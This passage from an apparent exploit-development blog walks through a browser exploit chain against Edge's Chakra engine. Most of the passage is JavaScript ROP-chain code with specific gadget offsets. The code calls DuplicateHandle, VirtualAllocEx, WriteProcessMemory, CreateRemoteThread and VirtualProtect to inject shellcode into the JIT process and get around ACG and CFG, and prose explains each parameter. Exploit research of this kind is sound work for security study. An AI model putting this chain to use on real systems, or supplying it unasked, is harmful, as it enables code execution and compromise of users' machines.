write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

You’ll notice right off the bat the comment about LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later. This is very contradictory to what we just said about setting the thread’s entry point to a ROP gadget, and just returning into the stack. I implore the reader to keep this mindset for now, as this is logical to think, but by the end of the blog post I hope it is clear to the reader that is a bit more nuanced than just setting the entry point to a ROP gadget. For now, this isn’t a big deal.

Let’s now see this in action. To make things easier, as we had been using pop rcx as a breakpoint up until this point, we will simply set a breakpoint on our jmp rax gadget and continue executing until we hit our WriteProcessMemory ROP chain (note our jmp rax gadget actually will always be called once before DuplicateHandle. This doesn’t affect us at all and is just mentioned as a point of contention). We will then use pt to execute the call to WriteProcessMemory, until the ret, which will bring us into our CreateRemoteThread ROP chain.

Now that we have hit our CreateRemoteThread ROP chain, we will setup our lpStartAddress parameter, which will go in R9. We will first place a writable address in RAX so that our mov r9, rcx gadget (we will pop our intended value in RCX that we want lpStartAddress to be) will not cause an access violation.

Our call to CreateRemoteThread is in the current state:

CreateRemoteThread(
	-
	-
	-
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	-
	-
	-
);

The next parameter we are going to knock out is the hProcess parameter - which is just the same handle to the JIT server with PROCESS_ALL_ACCESS that we have used several times already.

We can see we used pop to get the address of our JIT handle into RCX, and then we dereferenced RCX to get the raw value of the handle into RCX. We also already had a writable value in RAX, so we “bypass” the operation which writes to the memory address contained in RAX (and it doesn’t cause an access violation because the address is writable).

Our call to CreateRemoteThread is now in this state:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	-
	-
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	-
	-
	-
);

After retrieving the handle of the JIT process, our next parameter we will fill in is the lpThreadAttributes parameter - which just requires a value of 0. We can just directly write this value to the stack and use a pop operation to place the 0 value into RDX to essentially give our thread “normal” security attributes.

Easy as you’d like! Our call is now in the following state:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Default SECURITY_ATTRIBUTES
	-
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	-
	-
	-
);

Next up is the dwStackSize parameter. Again, we just want to use the default stack size (recall each thread has its own CPU register state, stack, etc.) - meaning we can specify 0 here.

We are now in the following state:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Default SECURITY_ATTRIBUTES
	0,				// Default Stack size
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	-
	-
	-
);

Since the rest of the parameters will be written to the stack RSP + 0x28, 0x30, 0x38. So, we will now place CreateRemoteThread into RAX and use our write primitive to write our remaining parameters to the stack (setting all to 0 but setting the dwCreationFlags to 4 to create this thread in a suspended state).

Our call is now in its final state:

CreateRemoteThread(
	fulljitHandle,			// PROCESS_ALL_ACCESS handle to JIT server we got from DuplicateHandle call
	NULL,				// Default SECURITY_ATTRIBUTES
	0,				// Default Stack size
	addressof(ret_gadget),		// Function pointer we want to execute (when the thread eventually executes, we want it to just return to the stack)
	NULL,				// No variable needs to be passed
	4,				// CREATE_SUSPENDED (Create the thread in a suspended state)
	NULL 				// Don't return the thread ID (we don't need it)
);

After executing the call, we get our return value which is a handle to the new thread which lives in the JIT server process.

Running Process Hacker as an administrator and viewing the Handles tab will show our returned handle is, in fact, a Thread handle and refers to the JIT server process.

If we then close out of the window (but not totally out of Process Hacker) we can examine the thread IT (TID) within the Threads tab of the JIT process to confirm where our thread is and what start address it will execute when the thread becomes non-suspended (e.g. resumed).

As we can see, when this thread executes (it is currently suspended and not executing) it will perform a ret, which will load RSP into RIP (or will it? Keep reading towards the end and use critical thinking skills as to why this may not be the case!). Since we will eventually write our final ROP chain to RSP, this will kick off our last ROP chain which will mark our shellcode as RWX. Our next two ROP chains, which are fairly brief, will simply be used to update our final ROP chain. We now have a thread we can control in the process where ACG is disabled - meaning we are inching closer.

WriteProcessMemory ROP Chain (Round 2)

Let’s quickly take a look at our “final” ROP chain (which currently resides in the content process, where our exploit is executing):

// VirtualProtect() ROP chain (will be called in the JIT process)
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x72E128, chakraHigh);         // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x74e030, chakraHigh);         // PDWORD lpflOldProtect (any writable address -> Eventually placed in R9)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0xf6270, chakraHigh);          // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding for add rsp, 0x28
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
inc();

// Store the current offset within the .data section into a var
ropoffsetOne = countMe;

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1d2c9, chakraHigh);          // 0x18001d2c9: pop rdx ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00001000, 0x00000000);                // SIZE_T dwSize (0x1000)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000040, 0x00000000);                // DWORD flNewProtect (PAGE_EXECUTE_READWRITE)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x577fd4, chakraHigh);         // 0x180577fd4: pop rax ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, kernelbaseLo+0x61700, kernelbaseHigh);  // KERNELBASE!VirtualProtect
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x272beb, chakraHigh);         // 0x180272beb: jmp rax (Call KERNELBASE!VirtualProtect)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x118b9, chakraHigh);          // 0x1800118b9: add rsp, 0x18 ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x41414141, 0x41414141);                // Padding
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x4c1b65, chakraHigh);         // 0x1804c1b65: pop rdi ; ret
inc();

// Store the current offset within the .data section into a var
ropoffsetTwo = countMe;

write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // Will be updated with the VirtualAllocEx allocation (our shellcode)
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x1ef039, chakraHigh);         // 0x1801ef039: push rdi ; ret (Return into our shellcode)
inc();

This is a VirtualProtect ROP chain, which will mark the target pages as RWX. As we know we cannot directly allocate and execute RWX pages via remote injection (VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread). So, instead, we will eventually leak the stack of our remote thread that exists within the JIT process (where ACG is disabled). When we resume the thread, our ROP chain will kick off and mark our shellcode as RWX. However, there is a slight problem with this. Let me explain.

We know our shellcode resides in the JIT process at whatever memory address VirtualAllocEx decided. However, our VirtualProtect ROP chain (shown above and at the beginning of this blog post) was embedded within the .data section of the content process (in order to store it, so we can inject it later when the time comes). The issue we are facing is that of a “runtime problem” as our VirtualProtect ROP chain has no way to know what address our shellcode will reside in via our VirtualAllocEx ROP chain. This is not only because the remote allocation occurs after we have “preserved” our VirtualProtect ROP chain, but also because when VirutalAllocEx allocates memory, we request a “private” region of memory, which is “randomized”, and is subject to change after each call to VirtualAllocEx. We can see this in the following gadget:

write64(chakraLo+0x74b000+countMe, chakraHigh, chakraLo+0x46377, chakraHigh);          // 0x180046377: pop rcx ; ret
inc();
write64(chakraLo+0x74b000+countMe, chakraHigh, 0x00000000, 0x00000000);                // LPVOID lpAddress (Eventually will be updated to the address we want to mark as RWX, our shellcode)
inc();

The above snippet is from our VirtualProtect ROP chain. When this ROP chain is stored before our massive multiple ROP chains we have been walking through, starting with DuplicateHandle and overwriting our return address, the VirtualProtect ROP chain has no way to know where our shellcode is going to end up. lpAddress is a parameter that requires…

The address of the starting page of the region of pages whose access protection attributes are to be changed.

The shellcode, which we inject into the remote JIT process, is the lpAddress we want to mark as RWX eventually. However, our VirtualProtect ROP chain just uses a placeholder for this value. What we are going to do is use another call to WriteProcessMemory to update this address, at our exploit’s runtime. You’ll also notice the following snippet:

// Store the current offset within the .data section into a var
ropoffsetOne = countMe;

These are simply variables (ropoffsetOne, ropoffsetTwo, ropBegin) that save the current location of our “counter”, which is used to easily write gadgets 8 bytes at a time (we are on a 64-bit system, every pointer is 8 bytes). We “save” the current location in the ROP chain in a variable to allow us to easily write to it later. This will make more sense when we see the full call to WriteProcessMemory via ROP.

Here is how this call is setup:

WriteProcessMemory(
	(HANDLE)0xFFFFFFFFFFFFFFFF, 				// Psuedo handle to the current process (the content process, when the exploit is executing)
	addressof(VirtualProtectROPChain_offset),		// Address of our return value from VirtualAllocEx (where we want to write the VirtualAllocEx_allocation address to)
	addressof(VirtualAllocEx_Allocation),			// Address of our VirtualAllocEx allocation (where our shellcode resides in the JIT process at this point in the exploit)
	0x8							// 64-bit pointer size (sizeof(QWORD)))
	NULL 							// Optional
);

Our ROP chain simply will write the address of our shellcode, in the remote JIT process (allocated via VirtualAllocEx) to our “final” VirtualProtect ROP chain so that the VirtualProtect ROP chain knows what pages to mark RWX. This is achieved via ROP, as seen below (including all previous ROP chains):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// SIZE_T dwSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // 0x1000 (shellcode size)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPVOID lpAddress (RDX)
// Let VirtualAllocEx decide where the memory will be located
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL address (let VirtualAllocEx deside where we allocate memory in the JIT process)
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
